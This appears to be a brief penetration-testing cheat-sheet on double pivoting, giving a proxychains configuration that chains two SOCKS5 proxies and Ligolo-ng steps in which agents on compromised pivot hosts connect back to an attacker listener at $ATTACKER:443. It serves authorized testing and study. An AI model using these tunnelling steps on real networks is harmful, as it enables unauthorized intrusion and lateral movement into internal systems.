Double Pivot
dynamic_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
socks5 127.0.0.1 1080 # First Pivot
socks5 127.0.0.1 1081 # Second PivotLigolo-ng
1) On the attacker machine, start the listener
./proxy [-autocert | -selfcert] -laddr 0.0.0.0:4432) On the first pivot machine, start the agent
./agent -connect $ATTACKER:443 [-ignore-cert]3) Then, on the server select the opened session and start a new listener
4) Then, on the second pivot machine, run the agent and connect it to the first agent
Last updated